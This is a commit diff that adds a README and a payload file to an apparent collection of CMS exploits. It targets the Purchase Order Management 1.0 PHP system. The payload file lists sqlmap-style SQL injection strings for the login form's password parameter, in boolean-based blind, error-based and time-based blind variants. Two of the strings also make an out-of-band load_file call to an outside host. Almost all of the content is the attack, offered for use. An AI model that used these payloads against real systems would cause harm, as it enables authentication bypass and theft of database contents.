add Purchase Order Management SQLi

100-各种CMS/Purchase Order Management/Purchase Order Management-1.0 sql注入/README.md

@@ -0,0 +1,4 @@
+
+CMS 官方地址
+https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
+

100-各种CMS/Purchase Order Management/Purchase Order Management-1.0 sql注入/payload.sh

@@ -0,0 +1,22 @@
+
+```mysql
+---
+Parameter: password (POST)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause
+Payload: username=pwKLHXbY&password=-4290') OR 6172=6172 AND ('XovE'='XovE
+Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+Payload: username=pwKLHXbY&password=j3X!k3l!R0'+(select
+load_file('\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\aej'))+'')
+OR (SELECT 8766 FROM(SELECT COUNT(*),CONCAT(0x717a6a6b71,(SELECT
+(ELT(8766=8766,1))),0x7162767871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('dncG'='dncG
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: username=pwKLHXbY&password=j3X!k3l!R0'+(select
+load_file('\\\\907tu6mdwzuv9ctlt93eg10er5xyls9jc74uvikkc0rcehfjmie8te5szqd23hxgomfa5yu.stupid.com\\aej'))+'')
+AND (SELECT 7405 FROM (SELECT(SLEEP(3)))pVNf) AND ('fltf'='fltf
+---
+```